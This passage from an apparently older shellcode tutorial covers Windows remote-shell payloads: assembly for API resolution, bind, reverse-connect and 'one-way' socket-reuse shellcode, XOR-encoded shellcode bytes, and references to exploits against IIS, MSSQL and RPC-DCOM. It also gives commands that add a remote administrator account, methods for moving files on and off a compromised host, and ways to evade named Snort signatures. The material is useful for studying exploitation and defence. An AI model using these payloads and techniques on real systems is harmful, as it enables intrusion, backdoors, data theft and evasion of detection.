+--[ 2.b.v Getting GetProcAddress()
+
+Once we know the base address of Kernel32.dll, we can locate its 
+Export Table and look for "GetProcAddress" string. We also can get 
+the total of exported functions. Using the number, we loop until we 
+find the string.
+
+	mov	esi,dword ptr [ebx+3Ch]		;to PE Header
+	add	esi,ebx 
+	mov	esi,dword ptr [esi+78h] 	;to export table
+	add	esi,ebx 
+	mov	edi,dword ptr [esi+20h] 	;to export name table
+	add	edi,ebx 
+	mov	ecx,dword ptr [esi+14h] 	;number of exported function
+	push	esi  
+	xor	eax,eax 			;our counter
+
+For each address in the jump table, we will check if the destination 
+name is match with "GetProcAddress". If not, we increase EAX by one 
+and continue searching. Once we found a match, EAX will be holding 
+our counter. Using the following formula, we can obtain the real 
+address of GetProcAddress().
+
+ProcAddr = (((counter * 2) + Ordinal) * 4) + AddrTable + Kernel32Base
+
+We count until we reach "GetProcAddress". Multiply the index by 2, 
+add it to the address of exported ordinals table. It should now point 
+to the ordinal of GetProcAddress(). Take the value, multiply it by 4. 
+Total it up with the address of the addrress of the table and 
+Kernel32 base address, we will get the real address of the 
+GetProcAddress(). We can use the same technique to get the address of 
+any exported function inside Kernel32. 
+
+
+--[ 2.b.vi Getting other functions by name
+
+Once we get the address of GetProcAddress(), we can easily obtain 
+address of any other API. Since there are quite a number of APIs that 
+we need to use, we (actually, most of these codes were dissass from 
+HSJ's exploit) build a function that take a function name and return 
+the address. To use the function, set ESI pointing to the name of the 
+API we want to load. It must be NULL terminated. Set EDI point to the 
+jump table. A jump table is just a location where we store all 
+addresses of API we need to call. Set ECX to number of API we want it 
+to resolve.
+
+In this example, we call to load 3 APIs:
+
+	mov	edi,esi 		;EDI is the output, our jump table
+	xor	ecx,ecx 
+	mov	cl,3 			;Load 3 APIs
+	call	loadaddr
+
+The "loadaddr" function that get the job done:
+
+loadaddr:
+	mov	al,byte ptr [esi] 
+	inc	esi  
+	test	al,al
+	jne	loadaddr	;loop till we found a NULL
+	push	ecx  
+	push	edx  
+	push	esi  
+	push	ebx  
+	call	edx  		;GetProcAddress(DLL, API_Name);
+	pop	edx  
+	pop	ecx  
+	stosd			;write the output to EDI
+	loop	loadaddr	;loop to get other APIs
+	ret
+
+
+--[ 2.b.vii Spawning a shell
+
+Once we have gone thru those troublesome API address loading, we can 
+finally do something useful. To spawn a shell in Windows, we need to 
+call the CreateProcess() API. To use this API, we need to set up the 
+STARTUPINFO in such a way that, the input, output and error handler 
+will be redirected to a socket. We also will set the structure so 
+that the process will have no window. With the structure setup, we 
+just need to call CreateProcess to launch "cmd.exe" to get an 
+interactive command shell in windows.
+
+;ecx is 0
+	mov	byte ptr [ebp],44h 		;STARTUPINFO size
+	mov	dword ptr [ebp+3Ch],ebx 	;output handler
+	mov	dword ptr [ebp+38h],ebx 	;input handler
+	mov	dword ptr [ebp+40h],ebx 	;error handler
+;STARTF_USESTDHANDLES |STARTF_USESHOWWINDOW
+	mov	word ptr [ebp+2Ch],0101h
+	lea	eax,[ebp+44h] 
+	push	eax  
+	push	ebp  
+	push	ecx  
+	push	ecx  
+	push	ecx  
+	inc	ecx  
+	push	ecx  
+	dec	ecx  
+	push	ecx  
+	push	ecx  
+	push	esi  
+	push	ecx  
+	call	dword ptr [edi-28] ;CreateProcess
+
+
+--[ 2.c Compiling our shellcode
+
+The Code section in the end of the paper contains source code 
+bind.asm. bind.asm is a complete shellcode written in Assembly 
+Language which will create a shell in Windows and bind it to a 
+specific port. Compile bind.asm:
+
+# tasm -l bind.asm
+
+It will produce 2 files:
+1.	bind.obj - the object code
+2.	bind.lst - assembly listing
+
+If we open bind.obj with a hex editor, we will see that the object 
+code start with something similar to this:
+
+01)	80 0A 00 08 62 69 6E 64-2E 61 73 6D 62 88 20 00   ....bind.asmb. .
+02)	00 00 1C 54 75 72 62 6F-20 41 73 73 65 6D 62 6C   ...Turbo Assembl
+03)	65 72 20 20 56 65 72 73-69 6F 6E 20 34 2E 31 99   er  Version 4.1.
+04)	88 10 00 40 E9 49 03 81-2F 08 62 69 6E 64 2E 61   ...@.I../.bind.a
+05)	73 6D 2F 88 03 00 40 E9-4C 96 02 00 00 68 88 03   sm/...@.L....h..
+06)	00 40 A1 94 96 0C 00 05-5F 54 45 58 54 04 43 4F   .@......_TEXT.CO
+07)	44 45 96 98 07 00 A9 B3-01 02 03 01 FE 96 0C 00   DE..............
+08)	05 5F 44 41 54 41 04 44-41 54 41 C2 98 07 00 A9   ._DATA.DATA.....
+09)	00 00 04 05 01 AE 96 06-00 04 46 4C 41 54 39 9A   ..........FLAT9.
+10)	02 00 06 5E 96 08 00 06-44 47 52 4F 55 50 8B 9A   ...^....DGROUP..
+11)	04 00 07 FF 02 5A 88 04-00 40 A2 01 91 A0 B7 01   .....Z...@......
+12)	01 00 00 EB 02 EB 05 E8-F9 FF FF FF 58 83 C0 1B   ............X...
+13)	...
+14)	5A 59 AB E2 EE C3 99 8A-07 00 C1 10 01 01 00 00   ZY..............
+15)	9C 6D 8E 06 D2 7C 26 F6-06 05 00 80 74 0E F7 06   .m...|&.....t...
+
+Our shellcode start with hex code of 0xEB, 0x02 as show in line 12 of 
+the partial hex dump above. It will end with 0xC3 as shown in line 14. 
+We need to use a hex editor to remove the first 176 bytes and the 
+last 26 bytes. (You don't need to do this if you are using NASM 
+compiler, but the author has been using TASM since his MS-DOS age).
+
+Now that we have the shellcode in its pure binary form, we just need 
+to build a simple program that read from this file and produce the 
+corresponding hex value in a C string. Refer to the Code section 
+(xor.cpp) for the code that will do that. The output of the program 
+is our shellcode in C string syntax:
+
+# xor bind.obj
+BYTE shellcode[436] = ""
+"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
+...
+"\xE2\xEE\xC3";
+
+
+--[ 3 The connection
+
+We have seen some of the basic building block of a shellcode. But we 
+have not cover the connection part of the shellcode. As mentioned, a 
+shellcode needs a shell and a connection to allow interactive command. 
+We want to be able to send any command and see the output. Regardless 
+if we are spawning a shell, transferring file or loop to wait for 
+further command, we need to setup a connection. There are three 
+published techniques: Bind to port, Reverse connect and Find socket 
+shellcode. We will look into each one of these, as well as their 
+limitation. Along the way, various exploits that uses these shellcode 
+will be demonstrated to get a better understanding.
+
+
+--[ 3.a Bind to port shellcode
+
+Bind to port shellcode is popular being used in proof of concept 
+exploit. The shellcode setup a socket, bind it to a specific port and 
+listen for connection. Upon accepting a connection, you spawn a shell.
+
+This following APIs are needed for this type of connection: 
+
+*	WSASocket()
+*	bind()
+*	listen()
+*	accept()
+
+It is important to note that we are using WSASocket() and not 
+socket() to create a socket. Using WSASocket will create a socket 
+that will not have an overlapped attribute. Such socket can be use 
+directly as a input/output/error stream in CreateProcess() API. This 
+eliminates the need to use anonymous pipe to get input/output from a 
+process which exist in older shellcode. The size of the shellcode 
+shrinks quite a bit using this technique. It was first introduced by 
+David Litchfield. You can find many of Bind too port shellcode in 
+Packetstorm Security by debugging shellcode of these exploits:
+
+*	slxploit.c
+*	aspcode.c
+*	aspx_brute.c
+
+
+--[ 3.a.1 Bind to port shellcode implementation
+
+	mov	ebx,eax 
+	mov	word ptr [ebp],2
+	mov	word ptr [ebp+2],5000h 		;port
+	mov	dword ptr [ebp+4], 0 		;IP
+	push	10h  
+	push	ebp  
+	push	ebx  
+	call	dword ptr [edi-12] 		;bind
+	inc	eax
+	push	eax		
+	push	ebx
+	call	dword ptr [edi-8] 		;listen (soc, 1)
+	push	eax
+	push	eax
+	push	ebx
+	call	dword ptr [edi-4] 		;accept
+
+
+Compiling bind.asm will create shellcode (435 bytes) that will work 
+with any service pack. We will test the bind to port shellcode using 
+a simple testing program - testskode.cpp. Copy the shellcode (in C 
+string) generated the xor program and parse it into testskode.cpp:
+
+BYTE shellcode[436] = ""
+"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
+...
+// this is the bind port of the shellcode
+	*(unsigned short *)&shellcode[0x134] = htons(1212) ^ 0x0000;
+
+	void *ma = malloc(10000);
+	memcpy(ma,shellcode,sizeof(shellcode));
+
+	__asm
+    {
+		mov	eax,ma
+		int 3
+        		jmp    eax
+    }
+	free(ma);
+
+Compile and running testskode.cpp will result in a break point just 
+before we jump to the shellcode. If we let the process continue, it 
+will bind to port 1212 and ready to accept connection. Using netcat, 
+we can connect to port 1212 to get a shell.
+
+
+--[ 3.a.2 Problem with bind to port shellcode
+
+Using proof of concept exploit with bind to port shellcode against 
+server in organization with firewall usually will not work. Even 
+though we successfully exploited the vulnerability and our shellcode 
+executed, we will have difficulties connecting to the bind port. 
+Usually, firewall will allow connection to popular services like port 
+25, 53, 80, etc. But usually these ports are already in used by other 
+applications. Sometimes the firewall rules just did not open these 
+ports. We have to assume that the firewall block every port, expect 
+for the port number of the vulnerable service.
+
+
+--[ 3.b Reverse connect shellcode 
+
+To overcome the limitation of bind to port shellcode, many exploits 
+prefer to use reverse connection shellcode. Instead of binding to a 
+port waiting for connection, the shellcode simply connect to a 
+predefined IP and port number to drop it a shell.
+
+We must include our IP and port number which the target must connect 
+to give a shell in the shellcode. We also must run netcat or anything 
+similar in advance, ready to accept connection. Of cause, we must be 
+using IP address which the victim machine is reachable. Thus, usually 
+we use public IP.
+
+The following APIs are needed to setup this type of connection:
+
+*	WSASocket()
+*	connect()
+
+You can find many of these examples in Packetstorm Security by 
+debugging shellcode of these exploits:
+
+*	jill.c
+*	iis5asp_exp.c
+*	sqludp.c
+*	iis5htr_exp.c
+
+
+--[ 3.b.1 Reverse connect shellcode implementation
+
+push	eax  
+push	eax  
+push	eax  
+push	eax  
+inc	eax  
+push	eax  
+inc	eax  
+push	eax  
+call	dword ptr [edi-8] 	;WSASocketA 
+mov	ebx,eax 
+mov	word ptr [ebp],2
+mov	word ptr [ebp+2],5000h	;port in network byte order
+mov	dword ptr [ebp+4], 2901a8c0h ;IP in network byte order
+push	10h  
+push	ebp  
+push	ebx  
+call	dword ptr [edi-4] ;connect
+
+Compiling reverse.asm will create shellcode (384 bytes) that will 
+work with any service pack. We will use this shellcode in our 
+JRun/ColdFusion exploit. However there is still one problem. This 
+exploit will not accept NULL character. We need to encode our 
+shellcode with an XOR shield. We can use the xor.cpp to encode our 
+shellcode using its third parameter.
+
+First, let's compile reverse.asm:
+
+# \tasm\bin\tasm -l reverse.asm
+
+Then, hex-edit reverse.obj to get our shellcode. Refer to bind to 
+port shellcode on how to do it. Now, use xor.cpp to print the 
+shellcode:
+
+# xor reverse.obj
+BYTE shellcode[384] = ""
+"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
+"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x5B\x01\x80\x30"
+"\x96\x40\xE2\xFA\xE8\x60\x00\x00\x00\x47\x65\x74\x50\x72\x6F\x63"
+...
+
+The first 36 bytes of the shellcode is our decoder. It has been 
+carefully crafted to avoid NULL. We keep this part of the shellcode. 
+Then, we run xor.cpp again with an extra parameter to xor the code 
+with 0x96.
+
+# xor reverse.obj 96
+BYTE shellcode[384] = ""
+"\x7D\x94\x7D\x93\x7E\x6F\x69\x69\x69\xCE\x15\x56\x8D\x1B\x36\x97"
+"\x6A\x69\x69\x15\x72\x6A\x1D\x7A\xA5\x5F\xF0\x2F\xCD\x97\x16\xA6"
+"\x00\xD6\x74\x6C\x7E\xF6\x96\x96\x96\xD1\xF3\xE2\xC6\xE4\xF9\xF5"
+...
+"\x56\xE3\x6F\xC7\xC4\xC0\xC5\x69\x44\xCC\xCF\x3D\x74\x78\x55";
+
+We take bytes sequence from the 37th bytes onwards. Combine the 
+encoder and the xored shellcode, we will get the actual shellcode 
+that we can use in our exploit.
+
+BYTE shellcode[384] = ""
+"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
+"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x5B\x01\x80\x30"
+"\x96\x40\xE2\xFA"
+"\x7E\xF6\x96\x96\x96\xD1\xF3\xE2\xC6\xE4\xF9\xF5"
+...
+"\x56\xE3\x6F\xC7\xC4\xC0\xC5\x69\x44\xCC\xCF\x3D\x74\x78\x55";
+
+We can use the following statements in our exploit to change the IP 
+and port to our machine which has netcat listening for a shell.
+ 
+*(unsigned int *)&reverse[0x12f] = resolve(argv[1]) ^ 0x96969696;
+*(unsigned short *)&reverse[0x12a] = htons(atoi(argv[2])) ^ 0x9696;
+
+The JRun/ColdFusion exploit is attached in the Code section 
+(weiwei.pl). The exploit uses Reverse connect shellcode.
+
+
+--[ 3.b.2 Problem with reverse connect shellcode
+
+It is not unusual to find server which has been configure to block 
+out going connection. Firewall usually blocks all outgoing connection 
+from DMZ.
+
+
+--[ 4 One-Way shellcode
+
+With the assumption that firewall has been configured with the 
+following rules:
+
+*	Blocks all ports except for listening ports of the services
+*	Blocks all outgoing connections from server
+
+Is there any way to control the server remotely? In some case, it is 
+possible to use existing resources in the vulnerable service to 
+establish the control. For example, it may be possible to hook 
+certain functions in the vulnerable service so that it will take over 
+socket connection or anything similar. The new function may check any 
+network packet for a specific signature. If there is, it may execute 
+command that attached along with the network packet. Otherwise, the 
+packet passes to the original function. We can then connect to the 
+vulnerable service with our signature to trigger a command execution. 
+As early as in 2001, Code Red worm uses some sort of function hooking 
+to deface web site 
+(http://www.eeye.com/html/Research/Advisories/AL20010717.html). 
+
+Another alternative will be to use resources that available from the 
+vulnerable service. It is also possible to patch the vulnerable 
+service to cripple the authentication procedure. This will be useful 
+for services like database, telnet, ftp, SSH and alike. In the case 
+of Web server, it is possible to create PHP/ASP/CGI pages in the web 
+root that will allow remote command execution via web pages. The 
+shellcode in the following link create an ASP page, as implemented by 
+Mikey (Michael Hendrickx):
+
+http://users.pandora.be/0xffffffce/scanit/tools/sc_aspcmd.c
+
+Code Red 2 worm also has a very interesting method to create a 
+backdoor of an IIS server. It creates a virtual path to drive C: and 
+D: of the server to the web root. Using these virtual paths, attacker 
+can execute cmd.exe which will then allow remote command execution:
+
+http://www.eeye.com/html/research/advisories/AL20010804.html
+
+However, these implementations are specific to the service we are 
+exploiting. We hope to find a generic mechanism to bypass the 
+firewall rules so that we can easily reuse our shellcode. With the 
+assumption that the only way to interact with the server is through 
+the port of the vulnerable service, we call these shellcode, One-way 
+shellcode:
+
+*	Find socket
+*	Reuse address socket
+*	Rebind socket
+
+
+--[ 4.a Find socket shellcode
+
+This method was documented in LSD's paper on Unix shellcode 
+(http://lsd-pl.net/unix_assembly.html). Although the code is for Unix, 
+we can use the same technique in the Windows world. The idea is to 
+locate the existing connection that the attacker was using during the 
+attack and use that connection for communication.
+
+Most WinSock API requires only the socket descriptor for its 
+operation. So, we need to find this descriptor. In our implementation, 
+we loop from 0x80 onwards. This number is chosen because socket 
+descriptors below 0x80 are usually not relevant to our network 
+connection. In our experience, using socket descriptor below 0x80 in 
+WinSock API sometimes crash our shellcode due to lack of Stack space.
+
+We will get the destination port of the network connection for each 
+socket descriptor. It is compared with a known value. We hard coded 
+this value in our shellcode. If there is a match, we found our 
+connection. However, socket may not be a non-overlapping socket. 
+Depending on the program that created the socket, there is 
+possibility that the socket we found is an overlapping socket. If 
+this is the case, we cannot use it directly as in/out/err handler in 
+CreateProcess(). To get an interaction communication from this type 
+of socket, we can anonymous pipe. Description on using anonymous pipe 
+in shellcode can be found in article by Dark Spyrit 
+(http://www.phrack.org/show.php?p=55&a=15) and LSD (http://lsd-
+pl.net/windows_components.html).
+
+xor	ebx,ebx
+	mov	bl,80h
+find:
+	inc	ebx
+	mov	dword ptr [ebp],10h
+	lea	eax,[ebp]
+	push	eax
+	lea	eax,[ebp+4]
+	push	eax
+ 	push	ebx	 			;socket
+	call	dword ptr [edi-4]		;getpeername
+	cmp	word ptr [ebp+6],1234h		;myport
+	jne	find
+found:
+	push	ebx				;socket
+
+Find socket shellcode work by comparing the destination port of the 
+socket with a known port number. Thus, attacker must obtain this port 
+number first before sending the shellcode. It can be easily done by 
+calling getsockname() on a connected socket.
+
+It is important to note that this type of shellcode should be use in 
+an environment where the attacker is not in a private IP. If you are 
+in a private IP, your Firewall NATing will create a new connection to 
+the victim machine during your attack. That connection will have a 
+different source port that what you obtain in your machine. Thus, 
+your shellcode will never be able to find the actually connection.
+
+Find socket implementation can be found in findsock.asm in the Code 
+section. There is also a sample usage of find socket shellcode in 
+hellobug.pl, an exploit for MS SQL discovered Dave Aitel.
+
+
+--[ 4.a.1 Problem with Find socket shellcode
+
+Find socket could be perfect, but in some case, socket descriptor of 
+the attacking connection is no longer available. It is possible that 
+the socket might already been closed before it reach the vulnerable 
+code. In some case, the buffer overflow might be in another process 
+altogether.
+
+
+--[ 4.b Reuse address shellcode
+
+Since we fail to find the socket descriptor of our connection in a 
+vulnerability that we are exploiting, we need to find another way. In 
+the worst scenario, the firewall allows incoming connection only to 
+one port; the port which the vulnerable service is using. So, if we 
+can somehow create a bind to port shellcode that actually bind to the 
+port number of the vulnerable service, we can get a shell by 
+connecting to the same port.
+
+Normally, we will not be able to bind to a port which already been 
+used. However, if we set our socket option to SO_REUSEADDR, it is 
+possible bind our shellcode to the same port of the vulnerable 
+service. Moreover, most applications simply bind a port to INADDR_ANY 
+interface, including IIS. If we know the IP address of the server, we 
+can even specify the IP address during bind() so that we can bind our 
+shellcode in front of vulnerable service. Binding it to a specific IP 
+allow us to get the connection first.
+
+Once this is done, we just need to connect to the port number of the 
+vulnerable service to get a shell. It is also interesting to note 
+that Win32 allow any user to connect to port below 1024. Thus, we can 
+use this method even if we get IUSR or IWAM account.
+
+If we don't know the IP address of the server (may be it is using 
+port forwarding to an internal IP), we still can bind the process to 
+INADDR_ANY. However, this means we will have 2 processes excepting 
+connection from the same port on the same interface. In our 
+experience, we may need to connect a few times to get a shell. This 
+is because the other process could occasionally get the connection.
+
+API needed to create a reuse address shellcode:
+
+*	WSASocketA()
+*	setsockopt()
+*	bind()
+*	listen()
+*	accept()
+
+
+--[ 4.b.1 Reuse address shellcode implementation
+
+mov	word ptr [ebp],2
+push	4
+push	ebp
+push	4				;SO_REUSEADDR
+push	0ffffh
+push	ebx
+call	dword ptr [edi-20] 	;setsockopt 
+mov	word ptr [ebp+2],5000h 	;port
+mov	dword ptr [ebp+4], 0h 	;IP, can be 0
+push	10h  
+push	ebp  
+push	ebx  
+call	dword ptr [edi-12] 	;bind
+
+Reuse address shellcode implementation is in reuse.asm (434 bytes) in 
+the Code section. Same usage of this type of shellcode is implemented 
+in reusewb.c exploit. This exploit is using the NTDLL (WebDav) 
+vulnerability on IIS Web server.
+
+
+--[ 4.b.2 Problem with reuse address shellcode
+
+Some applications use SO_EXCLUSIVEADDRUSE, thus reusing the address 
+is not possible. 
+
+
+--[ 4.c Rebind socket shellcode
+
+It is not unusual to find application that actually uses SO_ 
+EXCLUSIVEADDRUSE option to prevent us to reuse its address. So, our 
+research did not stop there. We feel that there is a need to create a 
+better shellcode. Assuming that we have same restriction we have as 
+before. The only way to connect to the vulnerable machine is via the 
+port of the vulnerable service. Instead of sharing the port 
+gracefully as reuse address socket shellcode, we can take over the 
+port number entirely.
+
+If we can terminate the vulnerable service, we can bind our shell 
+into the very same port that was previously used by the vulnerable 
+service. If we can achieve that, the next connection to this port 
+will yield a shell.
+
+However, our shellcode is usually running as part of the vulnerable 
+service. Terminating the vulnerable service will terminate our 
+shellcode.
+
+To get around with this, we need to fork our shellcode into a new 
+process. The new process will bind to a specific port as soon as it 
+is available. The vulnerable service will be forcefully terminated.
+
+Forking is not as simple as in Unix world. Fortunately, LSD has done 
+all the hard work for us (http://lsd-pl.net/windows_components.html). 
+It is done in the following manner as implemented by LSD:
+
+1.	Call CreateProcess() API to create a new process. We must 
+	supply a filename to this API. It doesn't matter which file, as 
+	long as it exist in the system. However, if we choose name like 
+	IExplore, we might be able to bypass even personal firewall. We 
+	also must create the process in Suspend Mode.
+2.	Call GetThreadContext() to retrieve the environment of the 
+	suspended process. This call allows us to retrieve various 
+	information, including CPU registry of the suspended process.
+3.	Use VirtualAllocEx() to create enough buffer for our shellcode 
+	in the suspended process.
+4.	Call WriteProcessMemory() to copy our shellcode from the 
+	vulnerable service to the new buffer in the suspended process.
+5.	Use SetThreadContext() to replace EIP with memory address of 
+	the new buffer.
+6.	ResumeThread() will resume the suspended thread. When the 
+	thread starts, it will point directly to the new buffer which 
+	contains our shellcode.
+
+The new shellcode in the separate process will loop constantly trying 
+to bind to port of the vulnerable service. However, until we 
+successfully terminate the vulnerable machine it will not be able to 
+continue.
+
+Back in our original shellcode, we will execute TerminateProcess() to 
+forcefully terminate the vulnerable service. TerminateProcess() take 
+two parameters, the Process handle to be terminated and the return 
+value. Since we are terminating the current process, we can just pass 
+-1 as the Process Handle.
+
+As soon as the vulnerable service terminated, our shellcode in a 
+separate process will be able to bind successfully to the specific 
+port number. It will continue to bind a shell to that port and 
+waiting for connection. To connect to this shell, we just need to 
+connect to the target machine on the port number of the vulnerable 
+service.
+
+It is possible to improve the shellcode further by checking source 
+port number of IP before allowing a shell. Otherwise, anyone 
+connecting to that port immediately after your attack will obtain the 
+shell.
+
+
+--[ 4.c.1 Rebind socket shellcode implementation
+
+Rebind socket shellcode is implemented in rebind.asm in the Code 
+section. We need to use a lot of APIs in this shellcode. Loading 
+these APIs by name will make our shellcode much bigger than it should 
+be. Thus, the rebind socket shellcode is using another method to 
+locate the APIs that we need. Instead of comparing the API by its 
+name, we can compare by its fingerprint/hash. We generate a 
+fingerprint for each API name we want to use and store it in our 
+shellcode. Thus, we only need to store 4 bytes (size of the 
+fingerprint) for each API. During shellcode execution, we will 
+calculate the fingerprint of API name in the Export Table and compare 
+it with our value. If there is a match, we found the API we need. The 
+function that loads an API address by its fingerprint in rebind.asm 
+was ripped from HD Moore's MetaSploit Framework 
+(http://metasploit.com/sc/win32_univ_loader_src.c).
+
+A sample usage of a rebind socket shellcode can be found rebindwb.c 
+and lengmui.c in the Code section. Rebindwb.c is an exploit modified 
+from the previous WebDAV exploit that make use of Rebind shellcode. 
+It will attack IIS, kill it and take over its port. Connecting to 
+port 80 after the exploit will grant the attacker a shell.
+
+The other exploit, lengmui.c is MSSQL Resolution bug, it attack UDP 
+1434, kill MSSQL server, bind itself to TCP 1433. Connection to TCP 
+1433 will grant the attacker a shell.
+
+
+--[ 4.d Other one-way shellcode
+
+There are other creative mechanisms being implemented by Security 
+Expert in the field. For example, Brett Moore's 91 bytes shellcode as 
+published in Pen-Test mailing list (http://seclists.org/lists/pen-
+test/2003/Jan/0000.html). It is similar to the Find Socket shellcode, 
+only that, instead of actually finding the attacking connection, the 
+shellcode create a new process of CMD for every socket descriptor.
+
+Also similar to Find socket shellcode, instead of checking the 
+destination port to identify our connection, XFocus's forum has 
+discussion on sending additional bytes for verification. Our 
+shellcode will read 4 more bytes from every socket descriptor, and if 
+the bytes match with our signature, we will bind a CMD shell to that 
+connection. It could be implemented as:
+
+*	An exploit send additional bytes as signature ("ey4s") after 
+	sending the overflow string
+*	The shellcode will set each socket descriptor to non-blocking
+*	Shellcode call API recv() to check for "ey4s"
+*	If there is a match, spawn CMD
+*	Loop if not true
+
+It is also possible to send it with "MSG_OOB" flag. As implemented by 
+san _at_ xfocus d0t org.
+
+Yet, another possibility is to implement shellcode that execute 
+command that attached in the shellcode it self. There is no need to 
+create network connection. The shellcode just execute the command and 
+die. We can append our command as part of the shellcode and execute 
+CreateProcess() API. A sample implementation can be found on dcomx.c 
+in the Code section. For example, we can use the following command to 
+add a remote administrator to a machine which is vulnerable to RPC-
+DCOM bug as discovered by LSD.
+
+# dcomx 10.1.1.1 "cmd /c net user /add compaquser compaqpass"
+# dcomx 10.1.1.1 "cmd /c net localgroup /add administrators compaquser"
+
+
+--[ 5 Transferring file using shellcode
+
+One of the most common things to do after you break into a box is to 
+upload or download files. We usually download files from our target 
+as proof of successful penetration testing. We also often upload 
+additional tools to the server to use it as an attacking point to 
+attack other internal server.
+
+In the absent of a firewall, we can easily use FTP or TFTP tools 
+found in standard Windows installation to get the job done:
+
+*	ftp -s:script
+*	tftp -i myserver GET file.exe
+
+
+However, in a situation where there is no other way to go in and out, 
+we can still transfer file using the shell we obtain from our One-way 
+shellcode. It is possible to reconstruct a binary file by using the 
+debug.exe command available in almost every Windows.
+
+
+--[ 5.a Uploading file with debug.exe
+
+We can create text file in our target system using the echo command. 
+But we can't use echo to create binary file, not with the help from 
+debug.exe. It is possible to reconstructing binary using debug.exe. 
+Consider the following commands:
+
+C:\>echo nbell.com>b.s
+C:\>echo a>>b.s
+C:\>echo dw07B8 CD0E C310>>b.s
+C:\>echo.>>b.s
+C:\>echo R CX>>b.s
+C:\>echo 6 >>b.s
+C:\>echo W>>b.s
+C:\>echo Q>>b.s
+C:\>debug<b.s
+
+The echo command will construct a debug script which contains 
+necessary instructions code in hex value to create a simple binary 
+file. The last command will feed the script into debug.exe, which 
+will eventually generate our binary file.
+
+However, we cannot construct a binary file larger than 64k. This is 
+the limitation of the debug.exe itself.
+
+
+--[ 6.b Uploading file with VBS
+
+Thus, a better idea to upload a binary file is to use Visual Basic 
+Script. VBS interpreter (cscript.exe) available by default in almost 
+all Windows platform. This is our strategy:
+ 
+1.	Create a VBS script that will read hex code from a file and 
+	rewrite it as binary.
+2.	Upload the script to target using "echo" command.
+3.	Read file to be uploaded, and "echo" the hex code to a file in 
+	the target server.
+4.	Run the VBS script to translate hex code to binary.
+
+A sample script like below can be use to read any binary file and 
+create the correspondence ASC printable hex code file.
+
+dread: while (1){
+	$nread2 = sysread(INFO, $disbuf, 100);
+	last dread if $nread2 == 0;
+	@bytes = unpack "C*", $disbuf;
+	foreach $dab (@bytes){
+		$txt .= sprintf "%02x", $dab;
+	}
+	$to .= "echo $txt >>outhex.txt\n";
+	$nnn++;
+	if ($nnn > 100) {
+		print SOCKET $to;
+		receive();
+		print ".";
+		$to="";
+		$nnn=0;
+	}
+	$txt = "";
+}
+
+Then, we create our VBS decoder in the target machine - "tobin.vbs". 
+We can easily use "echo" command to create this file in the target 
+machine. This decoder will read the outhex.txt created above and 
+construct the binary file.
+
+Set arr = WScript.Arguments 
+Set wsf = CreateObject("Scripting.FileSystemObject") 
+Set infile = wsf.opentextfile(arr(arr.Count-2), 1, TRUE) 
+Set file = wsf.opentextfile(arr(arr.Count-1), 2, TRUE) 
+do while infile.AtEndOfStream = false 
+	line = infile.ReadLine 
+       For x = 1 To Len(line)-2 Step 2 
+			thebyte = Chr(38) & "H" & Mid(line, x, 2) 
+			file.write Chr(thebyte) 
+       Next 
+loop 
+file.close 
+infile.close
+
+Once the decoder is in the target machine, we just need to execute it 
+to convert the Hex code into a binary file:
+
+# cscript tobin.vbs outhex.txt out.exe
+
+
+--[ 5.c Retrieving file from command line
+
+Once we have the ability to upload file to the machine, we can upload 
+a Base64 encoder to the target machine. We will use this encoder to 
+encode any file into a printable Base64 format. We can easily print 
+the output of the Base64 encoded in command line and capture the text. 
+Once we have the complete file in Base64, we will save that into a 
+file in our machine. Using WinZip or any Base64 decoder, we can 
+convert that file back into its binary form. The following command 
+allows us to retrieve any file in our target machine:
+
+print SOCKET "base64 -e $file outhex2.txt\n";
+receive();
+print SOCKET "type outhex2.txt\n";
+open(RECV, ">$file.b64");
+print RECV receive();
+
+Fortunately, all these file upload/downloading can be automated. 
+Refer to hellobug.pl in the Code section to see file transfer in 
+action.
+
+
+--[ 6 Avoiding IDS detection
+
+Snort rules now have several Attack-Response signatures that will be 
+able to detect common output from a Windows CMD shell. Every time we 
+start CMD, it will display a banner:
+
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+C:\Documents and Settings\sk
+
+There is a Snort rule that capture this banner:
+
+http://www.snort.org/snort-db/sid.html?sid=2123
+
+We can easily avoid this by spawning cmd.exe with the parameter of 
+"/k" in our shellcode. All we need to do is just to add 3 more bytes 
+in our shellcode from "cmd" to "cmd /k". You may also need to add 3 
+to the value in the decoder that count the number of byte that we 
+need to decode.
+
+There is also another Snort rules that capture a directory listing of 
+the "dir" command in a Windows shell:
+
+http://www.snort.org/snort-db/sid.html?sid=1292
+
+The rule compares "Volume Serial Number" in any established network 
+packet, if there is a match, the rule will trigger an alert.
+
+# dir
+ Volume in drive C is Cool
+ Volume Serial Number is SKSK-6622
+
+ Directory of C:\Documents and Settings\sk
+
+06/18/2004  06:22 PM    <DIR>          .
+06/18/2004  06:22 PM    <DIR>          ..
+12/01/2003  01:08 AM                58 ReadMe.txt
+
+To avoid this, we just need to include /b in our dir command. It is 
+best if we set this in an environment so that dir will always use 
+this argument:
+
+# set DIRCMD=/b
+# dir
+ReadMe.txt
+
+Snort also has signature that detect "Command completed" in:
+
+http://www.snort.org/snort-db/sid.html?sid=494
+
+This command usually generated by the "net" command. It is easy to 
+create a wrapper for the net command that will not display "Command 
+completed" status or use other tools like "nbtdump", etc.
+
+
+--[ 7 Restarting vulnerable service
+
+Most often, after a buffer overflow, the vulnerable service will be 
+unstable. Even if we can barely keep it alive, chances are we will 
+not be able to attack the service again. Although we can try to fix 
+these problem in our shellcode, but the easiest way is to restart the 
+vulnerable service via our shell. This usually can be done using "at" 
+command to schedule a command that will restart the vulnerable 
+service after we exit from our shell.
+
+For example, if our vulnerable service is IIS web server, we can 
+reset it using a scheduler:
+
+#at <time> iisreset
+
+In the case of MS SQL Server, we just need to start the 
+sqlserveragent service. This is a helper service installed by default 
+when you install MS SQL Server. It will constantly monitor and check 
+if the SQL Server process is running. If it is not, it will be 
+started. Executing the following command in our shell will start this 
+service, which in turn, help us to MS SQL Server once we exit. 
+
+#net start sqlserveragent
+
